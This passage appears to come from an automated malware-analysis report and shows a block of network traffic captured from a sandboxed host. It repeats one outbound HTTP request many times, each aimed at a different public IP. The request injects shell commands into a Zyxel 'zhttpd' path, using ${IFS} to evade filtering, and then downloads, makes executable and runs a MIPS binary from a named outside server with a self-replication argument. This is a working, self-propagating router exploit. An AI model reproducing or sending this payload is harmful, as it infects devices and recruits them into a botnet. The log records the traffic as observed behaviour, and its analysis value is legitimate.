                                            Feb 2, 2024 06:21:26.918926001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8201192.168.2.1556820153.138.24.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918967962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8202192.168.2.1558294135.201.173.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918967962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8203192.168.2.153381658.206.226.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919018984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8204192.168.2.1548254202.239.127.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919073105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8205192.168.2.1548272142.194.154.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919109106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8206192.168.2.1547724209.166.137.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919148922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8207192.168.2.155411897.207.57.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919207096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8208192.168.2.155752067.196.19.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919240952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8209192.168.2.1560230212.219.81.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919307947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8210192.168.2.153724857.183.111.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919337988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8211192.168.2.154375062.207.204.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919372082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8212192.168.2.1544062147.117.186.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919416904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8213192.168.2.1535412177.96.103.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919473886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8214192.168.2.153559472.235.124.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919512987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8215192.168.2.1539992177.70.163.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919563055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8216192.168.2.1553796128.10.13.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919615030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8217192.168.2.1535560166.174.133.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919641018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8218192.168.2.1549594148.83.47.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919692039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8219192.168.2.155724427.69.167.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919749975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8220192.168.2.1555858199.48.243.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919773102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8221192.168.2.1552846200.20.175.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919815063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8222192.168.2.154858841.139.57.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919842005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8223192.168.2.1556688114.222.25.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919893980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8224192.168.2.1558434107.89.0.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919939041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8225192.168.2.155190266.228.78.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.919989109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8226192.168.2.153572671.236.176.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920037985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8227192.168.2.1547558196.211.173.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920080900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8228192.168.2.153968813.75.113.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920124054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8229192.168.2.154738464.200.126.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920176983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8230192.168.2.1536998193.59.216.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920212984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8231192.168.2.153401434.50.138.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.920274019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8232192.168.2.1552552163.96.204.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933312893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8233192.168.2.155623059.231.232.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933342934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8234192.168.2.155305088.183.252.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933377981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8235192.168.2.153285260.10.117.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933429956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8236192.168.2.1550736142.52.226.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933466911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8237192.168.2.1538546221.229.172.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933530092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8238192.168.2.1540600221.128.134.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933558941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8239192.168.2.155989670.38.211.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933602095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8240192.168.2.1544680138.20.3.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933660984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8241192.168.2.1533366195.148.79.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933696985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8242192.168.2.1543100123.123.90.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933742046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8243192.168.2.15373129.157.54.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933793068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8244192.168.2.1551416126.217.65.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933814049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8245192.168.2.153671258.194.30.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933850050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8246192.168.2.155397273.161.185.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933878899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8247192.168.2.156097863.76.244.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933907986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8248192.168.2.153896212.168.229.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.933949947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8249192.168.2.155173079.223.98.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934025049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8250192.168.2.1555422147.49.225.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934073925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8251192.168.2.1532810203.183.252.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934114933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8252192.168.2.1556128142.170.44.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934158087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8253192.168.2.1548164200.90.52.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934202909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8254192.168.2.153608844.35.146.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934261084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8255192.168.2.153511014.165.208.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934262037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8256192.168.2.1552920212.195.101.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934292078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8257192.168.2.15593342.126.114.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934367895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8258192.168.2.155982662.186.227.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934406042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8259192.168.2.154900651.129.123.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934462070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8260192.168.2.1546292146.8.56.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934501886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8261192.168.2.154126288.224.143.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934545994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8262192.168.2.156083444.86.203.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934576988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8263192.168.2.153534058.206.107.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.934617043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8264192.168.2.1554124164.233.35.21443
                                            TimestampBytes transferredDirectionData
